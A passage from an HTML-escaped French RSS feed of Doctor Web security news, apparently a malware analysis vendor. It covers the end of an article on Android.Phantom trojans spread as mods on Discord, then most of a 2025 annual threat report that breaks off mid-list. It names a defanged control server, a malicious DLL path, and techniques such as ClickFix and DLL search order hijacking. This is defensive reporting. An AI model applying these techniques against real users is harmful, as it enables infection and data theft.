            &lt;/a&gt;
        &lt;/div&gt;
        &lt;p class="text-center"&gt;&lt;i&gt;Apkmody Chat&lt;/i&gt;&lt;br&gt;&lt;i&gt;(6 297 abonnés)&lt;/i&gt;&lt;/p&gt;
    &lt;/div&gt;
&lt;/div&gt;

&lt;p class="mt-5"&gt;Les criminels utilisent également les serveurs Discord à leurs propres fins. Le plus important d'entre eux est Spotify X, avec environ 24 000 abonnés. &lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/january/android_phantom/11_Android.Phantom.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/january/android_phantom/11_Android.Phantom.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/january/android_phantom/12_Android.Phantom.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/january/android_phantom/12_Android.Phantom.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Les administrateurs de serveurs Discord n'hésitent pas à proposer directement des mods infectés. Par exemple, dans la capture d'écran ci-dessus, l'administrateur du serveur propose de télécharger un mod pour le service de streaming musical Deezer au lieu de Spotify, ce dernier ayant cessé de fonctionner. &lt;/p&gt;

&lt;p&gt;Le mod opérationnel peut être téléchargé via le lien. Son code est protégé par un outil d'empaquetage commercial, à l'intérieur duquel le cheval de Troie &lt;a href="https://vms.drweb.fr/search/?q=Android.Phantom.1.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Phantom.1.origin&lt;/b&gt;&lt;/a&gt; est dissimulé. Il s'agit d'un chargeur de code distant ; sur commande du serveur &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt;, il charge &lt;a href="https://vms.drweb.fr/search/?q=Android.Phantom.2.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;, &lt;a href="https://vms.drweb.fr/search/?q=Android.Phantom.5&amp;lng=fr"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt; et le Trojan espion &lt;a href="https://vms.drweb.fr/search/?q=Android.Phantom.5.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt;. Ce dernier transmet aux attaquants des informations sur l'appareil, notamment, le numéro de téléphone, la géolocalisation et la liste des applications installées.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.fr/static/new-www/news/2026/january/android_phantom/13_Android.Phantom.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.fr/static/new-www/news/2026/january/android_phantom/13_Android.Phantom.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;La capture d'écran du serveur montre les langues parlées par les utilisateurs qui deviennent des cibles d'infection. Pour accéder aux discussions dans des langues autres que l'anglais, vous devez configurer une réaction avec le drapeau approprié. Les langues les plus populaires pour s'enregistrer étaient l'espagnol, le français, l'allemand, le polonais et l'italien (sans compter l'anglais, qui est la langue principale du serveur). De plus, les administrateurs du serveur n'ont pas mis en place de chat pour de nombreux pays asiatiques. &lt;/p&gt;

&lt;p&gt;Les chevaux de Troie peuvent causer des dommages importants aux propriétaires des appareils infectés. Voici quelques résultats possibles :&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;&lt;strong&gt;Complicité involontaire :&lt;/strong&gt; Le smartphone d'un utilisateur peut être utilisé comme un bot dans une attaque DDoS, faisant ainsi de son propriétaire un complice involontaire de la cybercriminalité.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;Activité illégale :&lt;/strong&gt; L'appareil peut être utilisé par des pirates informatiques pour se livrer à des activités illégales en ligne, comme l'utilisation du smartphone pour des escroqueries ou l'envoi de messages indésirables.&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;Augmentation de la consommation de la batterie et du trafic :&lt;/strong&gt; Les activités superflues entrainent une consommation accrue de la batterie et du forfait internet. &lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;Fuite de données personnelles :&lt;/strong&gt; &lt;a href="https://vms.drweb.fr/search/?q=Android.Phantom.5.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt; est un logiciel espion capable de transmettre des données concernant l'appareil et son propriétaire.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Les chevaux de Troie de cette famille constituent une menace pour les propriétaires d'appareils mobiles Android qui ne sont pas protégés par un logiciel antivirus à jour. Les jeunes utilisateurs qui ne se soucient pas des règles d'hygiène numérique et qui veulent simplement jouer à des jeux, écouter de la musique ou regarder des clips vidéo sont particulièrement exposés. &lt;/p&gt;

&lt;p&gt;Nous vous recommandons de ne pas télécharger de mods provenant de sites web et de chaînes douteux. En règle générale, vérifier les sources des mods ou des applications nécessite du temps, de l'expérience et de l'observation. Par conséquent, la meilleure option pour assurer votre tranquillité d'esprit et celle de vos proches est d'utiliser &lt;a href="https://products.drweb.fr/mobile/android/" target="_blank"&gt;Dr.Web Security Space pour les appareils mobiles&lt;/a&gt;. Cette solution protégera non seulement vos smartphones, mais également vos autres appareils intelligents : consoles de jeux, tablettes, téléviseurs connectés.&lt;/p&gt;


&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.Phantom/README.adoc"&gt;Indicateurs de compromission&lt;/a&gt;&lt;br /&gt;
Plus d'info sur &lt;a href="https://vms.drweb.fr/search/?q=Android.Phantom.1.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Phantom.1.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Plus d'info sur &lt;a href="https://vms.drweb.fr/search/?q=Android.Phantom.2.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Plus d'info sur &lt;a href="https://vms.drweb.fr/search/?q=Android.Phantom.3&amp;lng=fr"&gt;&lt;b&gt;Android.Phantom.3&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Plus d'info sur &lt;a href="https://vms.drweb.fr/search/?q=Android.Phantom.4.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Plus d'info sur &lt;a href="https://vms.drweb.fr/search/?q=Android.Phantom.5&amp;lng=fr"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Plus d'info sur &lt;a href="https://vms.drweb.fr/search/?q=Android.Phantom.5.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.fr/show/?i=15102&amp;lng=fr</guid><title>Doctor Web : rapport viral de l'année 2025</title><link>https://news.drweb.fr/show/?i=15102&amp;lng=fr&amp;c=5</link><pubDate>Thu, 15 Jan 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;Le 15 janvier 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;En 2025, les chevaux de Troie conçus pour afficher de la publicité sont devenus l'une des menaces les plus actives. Les utilisateurs ont également rencontré divers scripts malveillants et applications de type cheval de Troie, qui lancent d'autres logiciels malveillants sur le système infecté. Les chevaux de Troie, les portes dérobées, les exploits, les scripts malveillants et les documents d'hameçonnage ont été les types de menaces les plus fréquemment détectés dans le trafic e-mail.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Parmi les menaces mobiles, les plus répandues sont les chevaux de Troie publicitaires et les faux programmes utilisés dans diverses escroqueries. Une augmentation de l'activité des chevaux de Troie bancaires a également été constatée. Dans le même temps, les analystes de Doctor Web ont détecté des dizaines de nouvelles applications malveillantes, indésirables et publicitaires sur Google Play.&lt;/p&gt;

&lt;p&gt;Par rapport à 2024, le nombre de demandes de décryptage de fichiers de la part des utilisateurs a diminué. Dans le même temps, tout au long de l'année, nos analystes Internet ont constaté une augmentation du nombre de sites web frauduleux créés pour voler les comptes d'utilisateurs de la messagerie Telegram. De plus, les sites Web financiers frauduleux sont redevenus très courants.&lt;/p&gt;

&lt;p&gt;En 2025, le laboratoire antivirus Doctor Web a enquêté sur plusieurs attaques ciblées, dont l'une a été menée contre une entreprise russe de construction de machines. Lors de l'attaque, les attaquants ont utilisé plusieurs applications malveillantes pour tenter d'obtenir des données confidentielles à partir d'ordinateurs infectés. Nos spécialistes ont déterminé que le groupe de pirates informatiques Scaly Wolf a été impliqué dans l'attaque. Un autre incident s'est produit dans une agence gouvernementale russe, victime d'une attaque du groupe de pirates informatiques Cavalry Werewolf. Les analystes de Doctor Web ont identifié de nombreux outils malveillants utilisés par les attaquants et ont également analysé les caractéristiques du groupe ainsi que leurs actions typiques au sein des réseaux compromis.&lt;/p&gt;

&lt;p&gt;Au cours de l'année 2025, Doctor Web a également signalé plusieurs autres incidents de sécurité informatique. En janvier, le laboratoire de Doctor Web a révélé une campagne active d'extraction de la cryptomonnaie Monero, organisée à l'aide de nombreux programmes malveillants. En avril, nous avons signalé la présence d'un cheval de Troie dans le micrologiciel de plusieurs modèles de smartphones Android. En utilisant ce Trojan, les cybercriminels ont volé de la cryptomonnaie. De plus, en avril, nos experts ont identifié un cheval de Troie Android que les attaquants ont introduit dans l'une des versions d'une appli de cartographie populaire et ils l'ont utilisé pour espionner les militaires russes.&lt;/p&gt;

&lt;p&gt;En juillet, les experts de Doctor Web ont parlé d’une famille de &lt;a href="https://news.drweb.fr/show/?i=15036&amp;lng=fr" target="_blank"&gt;chevaux de Troie conçue pour voler des crypto-monnaies&lt;/a&gt; et des mots de passe. Les attaquants les ont diffusés sous le couvert de mods, de tricheurs et de correctifs pour les jeux. En août, nos analystes de virus ont mis en garde contre la propagation d’une porte dérobée multifonctionnelle ciblant les appareils mobiles, et visant les représentants d’entreprises russes. Les cybercriminels la contrôlaient à distance, pour voler des données confidentielles et traquer les victimes.&lt;/p&gt;

&lt;p&gt;En octobre nous avons signalé l'existence d'une &lt;a href="https://news.drweb.fr/show/?i=15076&amp;lng=fr" target="_blank"&gt;porte dérobée ciblant les appareils Android&lt;/a&gt; et diffusée par des cybercriminels dans des versions modifiées de l'application Telegram X. Ce logiciel malveillant vole les identifiants et mots de passe des comptes Telegram ainsi que d'autres données confidentielles. En utilisant ce malware, les auteurs de virus peuvent gérer les comptes des victimes piratées et contrôler entièrement la messagerie elle-même, en effectuant diverses actions au nom des utilisateurs.&lt;/p&gt;

&lt;p&gt;En décembre dernier, nous avons publié un article sur le &lt;a href="https://news.drweb.fr/show/?i=15090&amp;lng=fr" target="_blank"&gt;cheval de Troie, qui gonfle la popularité des sites web&lt;/a&gt; en se faisant passer pour un humain afin d'éviter d'être bloqué par les systèmes de protection anti-bot des plateformes en ligne. Le logiciel malveillant recherche de manière autonome les sites web souhaités dans les moteurs de recherche, les ouvre et clique sur des pages web en fonction des paramètres reçus des attaquants.&lt;/p&gt;

&lt;p&gt;L'année 2025 a également vu l'augmentation de la popularité des &lt;a href="https://news.drweb.fr/show/?i=15074&amp;lng=fr" target="_blank"&gt;attaques ClickFix&lt;/a&gt;, dans lesquelles les attaquants utilisent l'ingénierie sociale pour inciter les utilisateurs à exécuter du code malveillant sur leurs appareils.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Les tendances principales de l'année&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Une forte activité des chevaux de Troie publicitaires a été observée&lt;/li&gt;
        &lt;li&gt;De nouvelles attaques ciblées ont été enregistrées&lt;/li&gt;
        &lt;li&gt;Les attaques ClickFix ont gagné en popularité&lt;/li&gt;
        &lt;li&gt;Le nombre d'incidents liés aux chevaux de Troie de type rançongiciel a diminué&lt;/li&gt;
        &lt;li&gt;Le nombre de détections de chevaux de Troie bancaires ciblant Android a augmenté&lt;/li&gt;
        &lt;li&gt;De nouveaux cas de contamination du firmware Android ont été détectés&lt;/li&gt;
        &lt;li&gt;De nouvelles applications malveillantes et indésirables ont été détectées sur Google Play&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Les événements les plus intéressants de 2025&lt;/h3&gt;

&lt;p&gt;En janvier 2025, les spécialistes de Doctor Web ont identifié une &lt;a href="https://news.drweb.com/show/?i=14976&amp;lng=en" target="_blank"&gt;campagne de minage de la cryptomonnaie Monero&lt;/a&gt; utilisant le mineur malveillant SilentCryptoMiner. Ses fichiers ont été dissimulés sous l'apparence de divers logiciels, tels que des programmes de visioconférence Lors de l'infection des ordinateurs, ils supprimaient également les autres mineurs qui auraient pu être installés précédemment sur le système. Dans le cadre de cette campagne, les attaquants ont utilisé la stéganographie, une technique qui permet de dissimuler des données parmi d'autres (par exemple, dans des images), pour diffuser certains des éléments malveillants. Après avoir téléchargé les images spécialement conçues, les composants SilentCryptoMiner correspondants ont été extraits de celles-ci et lancés.&lt;/p&gt;

&lt;p&gt;En avril, nos analystes ont signalé &lt;a href="https://news.drweb.com/show/?i=15002&amp;lng=en" target="_blank"&gt;le Trojan&lt;/a&gt; &lt;a href="https://vms.drweb.fr/search/?q=Android.Clipper.31&amp;lng=fr"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt;, qui a été découvert dans le firmware de plusieurs smartphones Android d'entrée de gamme. Les attaquants l'ont intégré dans une version modifiée de la messagerie WhatsApp, qu'ils ont ensuite préinstallée sur des appareils, ayant compromis ainsi la chaîne d'approvisionnement de certains fabricants. &lt;a href="https://vms.drweb.fr/search/?q=Android.Clipper.31&amp;lng=fr"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; intercepte les messages envoyés et reçus dans le messenger, recherche dans les messages des adresses de portefeuilles cryptographiques Tron et Ethereum et en remplace par des adresses appartenant aux pirates. Le cheval de Troie dissimule la substitution, et les victimes voient les adresses correctes des portefeuilles crypto dans ces messages.&lt;/p&gt;

&lt;p&gt;Le même mois, les experts de Doctor Web ont découvert le cheval de Troie &lt;a href="https://vms.drweb.fr/search/?q=Android.Spy.1292.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt;, que des attaquants avaient implanté dans une version du programme de cartographie Alpine Quest et utilisé pour espionner le personnel militaire russe. L'application malveillante collectait des informations sensibles et permettait aux attaquants de voler des fichiers sur les appareils infectés.&lt;/p&gt;

&lt;p&gt;En juillet, Doctor Web a publié un &lt;a href="https://news.drweb.fr/show/?i=15036&amp;lng=fr" target="_blank"&gt;article sur les chevaux de Troie&lt;/a&gt; &lt;a href="https://vms.drweb.fr/search/?q=Trojan.Scavenger&amp;lng=fr"&gt;&lt;b&gt;Trojan.Scavenger&lt;/b&gt;&lt;/a&gt; conçus pour voler des cryptomonnaies et des mots de passe. Les attaquants les ont distribués sous le couvert de mods, de tricheurs et de correctifs pour les jeux. Ces applications malveillantes ont été lancées à l'aide d'applications légitimes, notamment grâce à l'exploitation des vulnérabilités de classe DLL Search Order Hijacking.&lt;/p&gt;

&lt;p&gt;En août, nos analystes ont mis en garde contre la &lt;a href="https://news.drweb.fr/show/?i=15047&amp;lng=fr" target="_blank"&gt;propagation de la porte dérobée multifonctionnelle&lt;/a&gt; &lt;a href="https://vms.drweb.fr/search/?q=Android.Backdoor.916.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; ayant ciblé les appareils mobiles, qui visait les représentants d’entreprises russes. L'application malveillante déguisée en antivirus a été diffusée par messages privés sur des messageries instantanées. Une fois installé sur les appareils cibles, &lt;a href="https://vms.drweb.fr/search/?q=Android.Backdoor.916.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; collectait des données sensibles et permettait aux attaquants d'espionner les victimes.&lt;/p&gt;

&lt;p&gt;En août, le laboratoire antivirus de Doctor Web a publié une étude sur une &lt;a href="https://news.drweb.fr/show/?i=15046" target="_blank"&gt;attaque ciblée du groupe Scaly Wolf&lt;/a&gt; contre une entreprise russe de construction de machines. Les attaquants ont utilisé un certain nombre d'outils malveillants, parmi lesquels la porte dérobée modulaire Updatar est devenue l'un des principaux. Il permettait aux attaquants de collecter des données sensibles à partir d'ordinateurs infectés.&lt;/p&gt;

&lt;p&gt;En octobre, les experts de Doctor Web ont parlé de la &lt;a href="https://news.drweb.fr/show/?i=15076&amp;lng=fr" target="_blank"&gt;porte dérobée&lt;/a&gt; &lt;a href="https://vms.drweb.fr/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, intégrée à des versions modifiées de l'application Telegram X. &lt;a href="https://vms.drweb.fr/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=fr"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; vole les identifiants et mots de passe des comptes Telegram, ainsi que d'autres données confidentielles. Ce logiciel malveillant permet aux attaquants de prendre le contrôle total du compte d'un utilisateur et de gérer le messenger en effectuant des actions au nom de la victime. Par exemple, des attaquants peuvent rejoindre et quitter des chaînes Telegram de manière discrète et dissimuler des appareils nouvellement autorisés dans l'interface du cheval de Troie Telegram X.&lt;/p&gt;

&lt;p&gt;En novembre, nous avons publié une étude sur une attaque ciblée menée par le groupe de pirates informatiques &lt;a href="https://news.drweb.fr/show/?i=15078&amp;lng=fr" target="_blank"&gt;Cavalry Werewolf&lt;/a&gt; contre un établissement public russe. Lors de l'analyse de l'incident, les experts de Doctor Web ont découvert de nombreux outils malveillants utilisés par les cybercriminels, y compris des outils open source. Les analystes ont étudié les caractéristiques du groupe et ont constaté que ses membres préfèrent utiliser des portes dérobées avec fonctionnalité de shell inversé et utilisent souvent l'API Telegram pour contrôler les ordinateurs infectés. Ils lancent également des attaques en envoyant des courriels d'hameçonnage prétendant provenir d'agences gouvernementales et en joignant à ces messages des logiciels malveillants déguisés en divers documents officiels.&lt;/p&gt;

&lt;p&gt;En décembre, Doctor Web a publié une étude du &lt;a href="https://news.drweb.fr/show/?i=15090&amp;lng=fr" target="_blank"&gt;logiciel malveillant&lt;/a&gt; &lt;a href="https://vms.drweb.fr/search/?q=Trojan.ChimeraWire&amp;lng=fr"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;, qui augmente artificiellement la popularité des sites web en se faisant passer pour un humain. Le cheval de Troie recherche les sites web souhaités sur les moteurs de recherche Google et Bing, les ouvre et clique sur les pages web chargées conformément aux instructions reçues des attaquants. &lt;a href="https://vms.drweb.fr/search/?q=Trojan.ChimeraWire&amp;lng=fr"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; est installé sur les ordinateurs à l'aide d'un certain nombre de programmes malveillants qui exploitent les vulnérabilités de la classe DLL Search Order Hijacking.&lt;/p&gt;

&lt;p&gt;Tout au long de l'année 2025, on a constaté une augmentation de la popularité des attaques utilisant la méthode ClickFix. Cette méthode consiste à recourir à l'ingénierie sociale afin d'amener des victimes potentielles à exécuter du code malveillant. Lorsque les utilisateurs arrivent sur un site malveillant ou compromis, celui-ci les informe d'une prétendue erreur ou de la nécessité de mettre à jour leur navigateur et leur propose de « remédier » au problème. &lt;/p&gt;

&lt;p&gt;Pour ce faire, les utilisateurs sont invités, selon la variante de l'attaque, à copier les lignes indiquées sur la page ou à cliquer simplement sur le bouton approprié (par exemple, « Mettre à jour » ou « Corriger »). Dans ce dernier cas, le contenu souhaité sera automatiquement copié dans le presse-papiers. Il leur sera ensuite demandé d'ouvrir une invite de commandes ou un terminal PowerShell, d'y coller le contenu du presse-papiers et d'appuyer sur Enter. De ce fait, les victimes exécutent elles-mêmes un code malveillant, ce qui déclenche une chaîne d'infections informatiques. Pour plus d'informations sur les attaques ClickFix, veuillez consulter &lt;a href="https://news.drweb.fr/show/?i=15074&amp;lng=fr" target="_blank"&gt;l'article correspondant&lt;/a&gt; sur notre site web.&lt;/p&gt;

&lt;h3&gt;Situation virale&lt;/h3&gt;

&lt;p&gt;Selon les statistiques de détection de l'antivirus Dr.Web, en 2025, le nombre total de menaces détectées a augmenté de 5,45% par rapport à 2024. Le nombre de menaces uniques a diminué de 15,89%. Le plus souvent, les utilisateurs ont rencontré divers scripts malveillants et chevaux de Troie publicitaires. De plus, les chevaux de Troie utilisés pour lancer d'autres programmes malveillants se sont largement répandus. Les utilisateurs ont été de nouveau menacés par des applications de type cheval de Troie créées dans le langage de script AutoIt et distribuées dans le cadre d'autres logiciels malveillants afin de les rendre plus difficiles à détecter.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/01_stat_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/01_stat_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.6&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.7&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Script malveillant qui, dans une boucle infinie, recherche des fenêtres avec les textes suivants : &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt; et &lt;span class="string"&gt;розробника&lt;/span&gt; et leur envoie un événement de clic sur le bouton Échap, les forçant à fermer.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.4242&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Composant malveillant de l'extension de navigateur WinSafe. Ce composant est un script JavaScript qui affiche des publicités intrusives dans les navigateurs.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8319&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8326&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8332&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Détection de scripts XML malveillants qui lancent le Trojan &lt;a href="https://vms.drweb.fr/search/?q=Trojan.AutoIt.289&amp;lng=fr"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; et ses composants.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=JS.Siggen5.44590&amp;lng=fr"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
    &lt;dd&gt;Code malveillant ajouté à la bibliothèque publique JavaScript es5-ext-main. Affiche un message spécifique si le package est installé sur un serveur avec le fuseau horaire des villes russes.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen30.53926&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Le processus hôte du framework Electron modifié par les pirates, imitant le composant d'application Steam (Steam Client WebHelper) et chargeant la porte dérobée JavaScript.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.MalVpn.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Un script malveillant utilisé par divers programmes malveillants pour se connecter aux serveurs de contrôle.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen31.34463&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Cheval de Troie écrit dans le langage de programmation Go et conçu pour charger divers miners et logiciels publicitaires dans le système cible. Le malware est un fichier DLL situé dans &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. Pour son lancement, il exploite une vulnérabilité de la classe DLL Search Order Hijacking dans le client torrent uTorrent.&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;En 2025, les logiciels malveillants les plus fréquemment détectés dans le trafic de messagerie étaient des chevaux de Troie qui téléchargeaient et installaient d'autres logiciels malveillants. Les attaquants ont également diffusé diverses portes dérobées par courrier électronique, des exploits, des documents d'hameçonnage et des scripts malveillants.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/02_email_traffic_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/02_email_traffic_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;W97M.DownLoader.2938&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Famille de Trojans Downloaders qui exploitent les vulnérabilités des documents créés dans MS Office. Ils sont conçus pour télécharger d'autres logiciels malveillants sur l'ordinateur attaqué.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2017-11882.123&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2018-0798.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Exploits conçus pour exploiter des vulnérabilités dans le logiciel Microsoft Office et qui permettent l'exécution du code arbitraire.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.Phishing.684&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;JS.Phishing.745&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Un script malveillant écrit en JavaScript qui crée une page web de phishing.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;BackDoor.AgentTeslaNET.20&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Logiciel espion malveillant conçu pour voler des informations confidentielles. Par exemple, il collecte et transmet aux attaquants les identifiants et mots de passe de diverses applications, telles que les navigateurs, les messageries instantanées, les clients de messagerie électronique, les bases de données, etc. Il vole également les données du presse-papiers, intègre une fonction d'enregistrement des frappes au clavier et peut réaliser des captures d'écran.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Win32.Expiro.153&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Virus de fichiers qui infecte les fichiers exécutables Windows. Son objectif principal est de voler les mots de passe de divers programmes.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.DownLoader.1225&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Détection heuristique des archives ZIP contenant des scripts JavaScript aux noms suspects.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.PackedNET.3223&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Détection de logiciels malveillants protégés par un packer.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1413&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Version packagée d'un cheval de Troie &lt;a href="https://vms.drweb.fr/search/?q=Trojan.AutoIt.289&amp;lng=fr"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; écrit dans le langage de script AutoIt. Cette version est distribuée dans le cadre d'un groupe de plusieurs applications malveillantes - un miner, une porte dérobée et un module d'auto-propagation. &lt;a href="https://vms.drweb.fr/search/?q=Trojan.AutoIt.289&amp;lng=fr"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; effectue différentes actions malveillantes qui empêchent la détection de la charge " utile " principale.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Rançongiciels&lt;/h3&gt;

&lt;p&gt;Par rapport à 2024, le support technique de Doctor Web a reçu 35,98% de demandes en moins de la part d'utilisateurs affectés par un ransomware à chiffrement en 2025. La dynamique d'enregistrement des demandes de décryptage des fichiers est présentée dans le schéma ci-dessous :&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/03_encoder_requests_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/03_encoder_requests_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Les ransomwares à chiffrement les plus répandus en 2025 :&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; &lt;span class="font-normal"&gt;(23,22% des demandes)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Rançongiciel connu sous le nom de Mimic. Lors de la recherche de fichiers cibles pour le cryptage, le cheval de Troie utilise la bibliothèque &lt;span class="string"&gt;everything.dll&lt;/span&gt; du programme Everything, qui est légitime et conçu pour rechercher instantanément des fichiers sur les ordinateurs Windows.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt; &lt;span class="font-normal"&gt;(3,33% des demandes)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Programme de chiffrement basé sur le code source du cheval de Troie Conti. Il chiffre des fichiers à l'aide de l'algorithme ChaCha20. Suite à la destruction de plusieurs serveurs de commande et de contrôle des attaquants et à la divulgation de clés de chiffrement RSA privées pour certaines modifications de ce logiciel malveillant, le déchiffrement des fichiers affectés est désormais possible.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35067&lt;/b&gt; &lt;span class="font-normal"&gt;(2,50% des demandes)&lt;/span&gt;&lt;/dt&gt;
